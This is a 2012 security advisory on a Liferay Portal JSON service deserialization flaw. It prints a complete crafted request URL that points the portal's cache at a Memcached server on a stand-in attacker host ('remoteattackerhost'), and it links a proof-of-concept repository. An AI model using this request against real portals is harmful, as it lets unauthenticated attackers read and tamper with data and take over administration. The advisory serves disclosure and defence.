Specially crafted Json service request allows full control over a Liferay portal instance

2012-04-23T00:00:00
ID SECURITYVULNS:DOC:27949
Type securityvulns
Reporter Securityvulns
Modified 2012-04-23T00:00:00

Description

Specially crafted Json service request allows full control over a Liferay portal instance

Description:

Liferay Portal is an enterprise portal written in Java.

A single HTTP request is enough to reconfigure Liferay to use a remote Memcached cache instead of its own cache. The JSON service endpoint deserializes request parameters into objects and honours a "class" key naming the class to instantiate, with the remaining keys set as properties of that object. The "bytes" argument of updatePortrait, which should be a byte array, can therefore be turned into a complete replacement cache configuration:

http://vulnerablehost/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil&serviceMethodName=updatePortrait&serviceParameters=[%22userId%22%2C%22bytes%22]&userId=1&bytes={"class":"com.liferay.portal.kernel.dao.orm.EntityCacheUtil","entityCache":{"class":"com.liferay.portal.dao.orm.common.EntityCacheImpl","multiVMPool":{"class":"com.liferay.portal.cache.MultiVMPoolImpl","portalCacheManager":{"class":"com.liferay.portal.cache.memcached.MemcachePortalCacheManager","timeout":60,"timeoutTimeUnit":"SECONDS","memcachedClientPool":{"class":"com.liferay.portal.cache.memcached.DefaultMemcachedClientFactory","connectionFactory":{"class":"net.spy.memcached.BinaryConnectionFactory"},"addresses":["remoteattackerhost:11211"]}}}}}

This means that every entity loaded from the database is from then on cached in a Memcached instance hosted on the attacker's host, where the attacker can read or manipulate it at will. A moderately skilled attacker could leverage this to gain administrative access to the system. The attacker does not need an account on the portal to execute this attack.

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-26558-proof

Systems affected:

Liferay 6.1 CE is confirmed to be vulnerable.
Liferay 6 EE service pack 2 is most likely vulnerable.
Liferay 6.1 EE is most likely vulnerable.

Vendor status :

Liferay was notified on April 6, 2012 by filing a bug in their public bug tracker under issue number LPS-26558. The issue has since been flagged as private and has been resolved.